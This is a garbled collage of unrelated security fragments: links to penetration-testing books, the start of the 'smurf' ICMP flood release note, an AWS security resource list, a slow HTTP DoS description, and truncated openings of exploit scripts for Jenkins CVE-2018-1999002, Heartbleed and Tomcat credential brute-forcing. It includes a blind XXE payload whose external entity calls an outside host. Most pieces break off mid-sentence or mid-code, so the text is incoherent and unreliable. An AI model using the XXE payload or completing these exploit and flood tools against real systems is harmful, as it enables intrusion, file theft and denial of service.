- https://wizardforcel.gitbooks.io/web-hacking-101/content/ Web Hacking 101 (Chinese edition)
- https://wizardforcel.gitbooks.io/asani/content/ A Gentle Introduction to Android Security (Chinese edition)
- https://wizardforcel.gitbooks.io/lpad/content/ Android Penetration Testing Study Handbook (Chinese edition)
- https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Kali Linux Web Penetration Testing Cookbook (Chinese edition)
- https://github.com/hardenedlinux/linux-exploit-development-tutorial Introduction to Linux exploit development
- https://www.gitbook.com/book/t0data/burpsuite/details burpsuite practical guide
- http://www.kanxue.com/?article-read-1108.htm=&winzoom=1 Penetration testing Node.js applications
- https://github.com/qazbnm456/awesome-web-security List of web security materials and resources
Well, I suppose it's `safe' to release this, it seems everyone and their dog has
it and apparently (and to my surprise) it still works.
The `smurf' attack is quite simple. It has a list of broadcast addresses which
it stores into an array, and sends a spoofed icmp echo request to each of those
addresses in series and starts again. The result is a devastating attack upon
the spoofed ip with, depending on the amount of broadcast addresses used,
many, many computers responding to the echo request.
Before I continue may I first say that this code was a mistake. When it was
INTRO
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute.
Short Link: http://tiny.cc/awssecurity
Official AWS Security Resources
* Security Blog - http://blogs.aws.amazon.com/security/
* Security Advisories - http://aws.amazon.com/security/security-bulletins/
* Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf
* Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf
- namespaces - overview of Linux namespaces http://man7.org/linux/man-pages/man7/namespaces.7.html
- mount_namespaces - overview of Linux mount namespaces
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
Slow HTTP attacks are denial-of-service (DoS) attacks in which the attacker sends HTTP requests in pieces slowly, one at a time to a Web server. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. When the server’s concurrent connection pool reaches its maximum, this creates a DoS. Slow HTTP attacks are easy to execute because they require only minimal resources from the attacker.
The attack exploits the fact that most modern web servers do not limit the connection duration as long as data is flowing. Because a TCP connection can be prolonged virtually forever with zero or minimal data flow by manipulating the TCP receive window size, it is possible to acquire the application's concurrent connection pool. The possibility of prolonging a TCP connection is described in several vulnerability reports: MS09-048, CVE-2008-4609, CVE-2009-1925, CVE-2009-1926.
Prerequisites for the successful attack are: - victim serve
import requests
import sys
import os
PLUGIN = 'credentials'
BACKDIR_COUNT = 10
if len(sys.argv) != 3:
    print 'usage:\n\tpython CVE-2018-1999002.py [jenkins base url] [absolute file path]'
    print ''
local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local string = require "string"
description = [[
Detects if the service is serving an nginx status page
]]
---
#!/usr/bin/env python2
"""
Author: takeshix <[email protected]>
PoC code for CVE-2014-0160. Original PoC by Jared Stafford ([email protected]).
Supports all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
"""
import sys,struct,socket
from argparse import ArgumentParser
# author: @egre55
# script to automate the testing of common apache tomcat credentials
#!/usr/bin/env python
import sys
import requests
with open('tomcat-betterdefaultpasslist.txt') as f:
    for line in f: